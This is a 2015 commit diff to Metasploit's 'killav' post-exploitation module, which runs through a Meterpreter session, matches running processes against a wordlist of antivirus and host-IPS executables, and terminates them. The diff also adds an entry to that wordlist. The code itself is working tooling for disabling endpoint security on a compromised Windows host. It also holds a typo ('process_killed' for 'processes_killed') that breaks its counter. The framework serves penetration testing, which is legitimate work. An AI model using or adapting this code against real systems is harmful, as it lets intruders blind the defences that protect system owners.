Fix killav post module, handle errors, better output

OJ · OJ · commit 986463e489b4 · 2015-07-16T11:35:01.000+10:00
diff --git a/data/wordlists/av_hips_executables.txt b/data/wordlists/av_hips_executables.txt
@@ -118,6 +118,7 @@ bvt.exe
 ccapp.exe
 ccevtmgr.exe
 ccpxysvc.exe
+ccsvchst.exe
 cdp.exe
 cfd.exe
 cfgwiz.exe
diff --git a/modules/post/windows/manage/killav.rb b/modules/post/windows/manage/killav.rb
@@ -2,34 +2,57 @@
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-##
 
 require 'msf/core'
+require 'set'
 
-class Metasploit3 < Msf::Post
+class Metasploit4 < Msf::Post
 
   def initialize(info={})
     super(update_info(info,
-        'Name'          => 'Windows Post Kill Antivirus and Hips',
-        'Description'   => %q{
-          Converted and merged several post scripts to remove a maximum of av and hips.
-        },
-        'License'       => MSF_LICENSE,
-        'Author'        => [ 'Marc-Andre Meloche (MadmanTM)', 'Nikhil Mittal (Samratashok)', 'Jerome Athias'],
-        'Platform'      => [ 'win' ],
-        'SessionTypes'  => [ 'meterpreter' ]
+      'Name'         => 'Windows Post Kill Antivirus and Hips',
+      'Description'  => %q{
+        This module attempts to locate and terminate any processes that are identified
+        as being Antivirus or Host-based IPS related.
+      },
+      'License'      => MSF_LICENSE,
+      'Author'       => [
+        'Marc-Andre Meloche (MadmanTM)',
+        'Nikhil Mittal (Samratashok)',
+        'Jerome Athias'
+      ],
+      'Platform'     => ['win'],
+      'SessionTypes' => ['meterpreter']
     ))
   end
 
   def run
+    avs = ::File.read(::File.join(Msf::Config.data_directory, 'wordlists',
+                                  'av_hips_executables.txt')).strip
+    avs = Set.new(avs.split("\n"))
 
-  avs = ::File.read(::File.join(Msf::Config.data_directory, 'wordlists', 'av_list.txt'))
+    processes_found = 0
+    processes_killed = 0
+    client.sys.process.get_processes().each do |x|
+      vprint_status("Checking #{x['name'].downcase} ...")
+      if avs.include?(x['name'].downcase)
+        processes_found += 1
+        print_status("Attempting to terminate '#{x['name']}' (PID: #{x['pid']}) ...")
+        begin
+          client.sys.process.kill(x['pid'])
+          process_killed += 1
+          print_good("#{x['name']} terminated.")
+        rescue Rex::Post::Meterpreter::RequestError
+          print_error("Failed to terminate '#{x['name']}' (PID: #{x['pid']}).")
+        end
+      end
+    end
+
+    if processes_found == 0
+      print_status('No target processes were found.')
+    else
+      print_good("A total of #{processes_found} process(es) were discovered, #{processes_killed} were terminated.")
+    end
+  end
 
-   client.sys.process.get_processes().each do |x|
-       if avs.include?(x['name'].downcase)
-       print_status("Killing off #{x['name']}...")
-       client.sys.process.kill(x['pid'])
-     end
-   end
-end
 end
